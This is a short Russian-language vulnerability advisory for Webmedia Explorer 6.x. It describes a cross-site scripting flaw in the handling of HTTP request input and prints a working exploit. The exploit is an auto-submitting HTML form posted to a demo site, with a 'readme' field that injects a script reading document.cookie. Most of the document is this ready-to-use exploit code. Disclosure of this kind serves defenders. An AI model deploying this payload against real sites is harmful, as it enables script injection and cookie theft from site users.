Программа: Webmedia Explorer 6.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
<form action="http://demo.webmediaexplorer.com/folder/post_23/my-article.html"
method="post" name="main" >
<input type="hidden" name="object" value="folder" />
<input type="hidden" name="desc" value="My Article" />
<input type="hidden" name="tags" value="webmedia" />
<input type="hidden" name="position" value="" />
<input type="hidden" name="readme" value='Hello WebMedia Explorer!"><script>alert(document.cookie)</script>'
/>
<input type="hidden" name="day" value="22" />
<input type="hidden" name="month" value="05" />
<input type="hidden" name="year" value="2010" />
<input type="hidden" name="hour" value="14" />
<input type="hidden" name="minute" value="21" />
</form>
<script>
document.main.submit();
</script>
